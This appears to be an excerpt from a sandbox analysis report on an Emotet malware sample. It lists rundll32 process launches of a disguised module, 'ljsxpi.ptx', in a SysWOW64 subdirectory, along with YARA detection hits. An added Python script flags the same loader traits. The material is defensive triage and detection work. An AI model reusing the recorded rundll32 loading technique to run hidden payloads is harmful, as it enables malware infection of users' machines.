                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.617141455.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                          Target ID:16
                                                                          Start time:21:30:49
                                                                          Start date:28/01/2022
                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cdragpegkvqde\ljsxpi.ptx",mYtMYmZ
                                                                          Imagebase:0xc00000
                                                                          File size:44544 bytes
                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.620719407.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.620541885.00000000002A1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.620492867.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                          Target ID:17
                                                                          Start time:21:30:57
                                                                          Start date:28/01/2022
                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cdragpegkvqde\ljsxpi.ptx",DllRegisterServer
                                                                          Imagebase:0xc00000
                                                                          File size:44544 bytes
                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.683540331.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.679113549.0000000000351000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.681597853.0000000002C91000.00000020.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.680671662.00000000026A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.680752870.00000000026D1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.679483027.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.679062553.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.681792444.0000000002EC1000.00000020.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.681556359.0000000002C60000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.679555584.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.681640222.0000000002D00000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.681204228.0000000002860000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.679178655.00000000005A1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.680211767.00000000025E1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.681736430.0000000002E90000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.679134510.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.681713030.0000000002E61000.00000020.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.681364704.0000000002891000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.679503750.0000000000B81000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                          No disassembly
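The Target ID 17 entry above records the Emotet loader stage: the 32-bit rundll32.exe from SysWOW64 (Wow64 process: true) loads a module with a non-DLL extension (ljsxpi.ptx) from a randomly named subdirectory of SysWOW64 and calls its DllRegisterServer export, which is the pattern behind the "living off the land binaries" and "Sigma detected" entries in the signature list. Below is an added triage example, not part of the Joe Sandbox report or its detection rules, that parses rundll32 command lines and flags this combination of traits. The command line for the first sample record is copied from the report; the other records, the KNOWN_DLL_EXTS list and the SYSTEM_DIRS list are constructed assumptions for contrast and are not claims about this sample.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample process records. The first line is the command line the
# report shows for Target ID 17; the other two are benign lines made up here
# for contrast and do not come from the report.
SAMPLE_COMMANDLINES = [
    r'C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cdragpegkvqde\ljsxpi.ptx",DllRegisterServer',
    r'C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL desk.cpl',
    r'C:\Windows\System32\rundll32.exe C:\Windows\System32\advpack.dll,DelNodeRunDLL32',
]

# rundll32.exe <module>[,<export>] [arguments]; the module path may be quoted.
RUNDLL_RE = re.compile(
    r'(?i)^"?(?P<exe>[^"\s]*rundll32\.exe)"?\s+'
    r'(?:"(?P<qmod>[^"]+)"|(?P<mod>[^\s,]+))'
    r'(?:,(?P<export>[^\s]+))?'
    r'(?:\s+(?P<args>.*))?$'
)

# Assumed list of extensions that legitimately hold rundll32-loadable code.
KNOWN_DLL_EXTS = {".dll", ".cpl", ".ocx", ".ax", ".drv"}

# Assumed Windows system directories; Emotet in this report dropped its module
# into a subdirectory of the second one.
SYSTEM_DIRS = (
    PureWindowsPath(r"C:\Windows\System32"),
    PureWindowsPath(r"C:\Windows\SysWOW64"),
)


def parse_rundll32(cmdline):
    """Split a rundll32 command line into exe, module, export and arguments.

    Returns None when the line is not a rundll32 invocation.
    """
    m = RUNDLL_RE.match(cmdline.strip())
    if m is None:
        return None
    return {
        "exe": m["exe"],
        "module": m["qmod"] or m["mod"],
        "export": m["export"],
        "args": m["args"],
    }


def score_rundll32(cmdline):
    """Return the list of suspicious traits found in one rundll32 command line."""
    rec = parse_rundll32(cmdline)
    if rec is None:
        return []
    reasons = []
    mod = PureWindowsPath(rec["module"])

    # Trait 1: module extension that is not a DLL-like extension (here .ptx).
    if mod.suffix.lower() not in KNOWN_DLL_EXTS:
        reasons.append(f"module extension {mod.suffix!r} is not a DLL-like extension")

    # Trait 2: DllRegisterServer reached through rundll32 rather than regsvr32.
    if rec["export"] and rec["export"].lower() == "dllregisterserver":
        reasons.append("DllRegisterServer export invoked through rundll32")

    # Trait 3: module stored in a subdirectory of a system directory rather than
    # in the system directory itself (PureWindowsPath compares case-insensitively).
    for sysdir in SYSTEM_DIRS:
        if mod.parent != sysdir and sysdir in mod.parent.parents:
            reasons.append(f"module lives in subdirectory {mod.parent} of {sysdir}")
            break
    return reasons


def triage(cmdlines):
    """Map each flagged command line to its reasons; clean lines are omitted."""
    return {c: r for c in cmdlines if (r := score_rundll32(c))}


if __name__ == "__main__":
    for line, reasons in triage(SAMPLE_COMMANDLINES).items():
        print(line)
        for reason in reasons:
            print("  -", reason)
```

Only the report's command line trips all three traits; the two constructed benign lines produce no findings, which is the behaviour a detection should have before it is widened to, say, any rundll32 module outside a signed-binary allowlist.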